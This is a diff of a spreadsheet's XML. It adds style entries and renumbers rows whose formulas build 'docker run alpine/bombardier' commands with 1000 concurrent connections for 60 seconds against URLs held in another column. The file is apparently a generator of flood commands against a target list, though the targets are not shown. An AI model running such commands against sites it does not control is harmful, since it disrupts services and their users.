+      <alignment vertical="bottom"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="4" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
+      <alignment vertical="bottom"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="5" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
+      <alignment vertical="bottom"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="6" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
+      <alignment vertical="bottom"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="7" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
+      <alignment vertical="bottom"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="8" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
       <alignment vertical="bottom"/>
     </xf>
   </cellXfs>
@@ -1421,13 +1512,13 @@
     <row r="9" ht="14.6" customHeight="1">
       <c r="A9" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B9&amp;" &amp;&amp; sleep 5;"</f>
-        <v>21</v>
+        <v>24</v>
       </c>
       <c r="B9" t="s" s="2">
-        <v>22</v>
+        <v>25</v>
       </c>
       <c r="C9" t="s" s="2">
-        <v>24</v>
+        <v>26</v>
       </c>
       <c r="D9" s="3"/>
       <c r="E9" s="3"/>
@@ -1435,13 +1526,13 @@
     <row r="10" ht="14.6" customHeight="1">
       <c r="A10" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B10&amp;" &amp;&amp; sleep 5;"</f>
-        <v>25</v>
+        <v>27</v>
       </c>
       <c r="B10" t="s" s="2">
-        <v>26</v>
+        <v>28</v>
       </c>
       <c r="C10" t="s" s="2">
-        <v>27</v>
+        <v>29</v>
       </c>
       <c r="D10" s="3"/>
       <c r="E10" s="3"/>
@@ -1449,13 +1540,13 @@
     <row r="11" ht="14.6" customHeight="1">
       <c r="A11" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B11&amp;" &amp;&amp; sleep 5;"</f>
-        <v>28</v>
+        <v>30</v>
       </c>
       <c r="B11" t="s" s="2">
-        <v>29</v>
+        <v>31</v>
       </c>
       <c r="C11" t="s" s="2">
-        <v>30</v>
+        <v>32</v>
       </c>
       <c r="D11" s="3"/>
       <c r="E11" s="3"/>
@@ -1463,13 +1554,13 @@
     <row r="12" ht="14.6" customHeight="1">
       <c r="A12" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B12&amp;" &amp;&amp; sleep 5;"</f>
-        <v>31</v>
+        <v>33</v>
       </c>
       <c r="B12" t="s" s="2">
-        <v>32</v>
+        <v>34</v>
       </c>
       <c r="C12" t="s" s="2">
-        <v>33</v>
+        <v>35</v>
       </c>
       <c r="D12" s="3"/>
       <c r="E12" s="3"/>
@@ -1477,56 +1568,49 @@
     <row r="13" ht="14.6" customHeight="1">
       <c r="A13" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B13&amp;" &amp;&amp; sleep 5;"</f>
-        <v>34</v>
+        <v>36</v>
       </c>
       <c r="B13" t="s" s="2">
-        <v>35</v>
+        <v>37</v>
       </c>
       <c r="C13" t="s" s="2">
-        <v>36</v>
+        <v>38</v>
       </c>
       <c r="D13" s="3"/>
       <c r="E13" s="3"/>
     </row>
     <row r="14" ht="14.6" customHeight="1">
-      <c r="A14" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B14&amp;" &amp;&amp; sleep 5;"</f>
-        <v>37</v>
-      </c>
-      <c r="B14" t="s" s="2">
-        <v>38</v>
-      </c>
-      <c r="C14" t="s" s="2">
-        <v>39</v>
-      </c>
+      <c r="A14" s="4"/>
+      <c r="B14" s="5"/>
+      <c r="C14" s="6"/>
       <c r="D14" s="3"/>
       <c r="E14" s="3"/>
     </row>
     <row r="15" ht="14.6" customHeight="1">
       <c r="A15" s="2"/>
-      <c r="B15" s="2"/>
-      <c r="C15" s="2"/>
+      <c r="B15" s="7"/>
+      <c r="C15" s="8"/>
       <c r="D15" s="3"/>
       <c r="E15" s="3"/>
     </row>
     <row r="16" ht="14.6" customHeight="1">
       <c r="A16" s="2"/>
-      <c r="B16" s="2"/>
-      <c r="C16" s="2"/>
+      <c r="B16" s="7"/>
+      <c r="C16" s="8"/>
       <c r="D16" s="3"/>
       <c r="E16" s="3"/>
     </row>
     <row r="17" ht="14.6" customHeight="1">
       <c r="A17" s="2"/>
-      <c r="B17" s="2"/>
-      <c r="C17" s="2"/>
+      <c r="B17" s="7"/>
+      <c r="C17" s="8"/>
       <c r="D17" s="3"/>
       <c r="E17" s="3"/>
     </row>
     <row r="18" ht="14.6" customHeight="1">
       <c r="A18" s="2"/>
-      <c r="B18" s="2"/>
-      <c r="C18" s="2"/>
+      <c r="B18" s="9"/>
+      <c r="C18" s="10"/>
       <c r="D18" s="3"/>
       <c r="E18" s="3"/>
     </row>
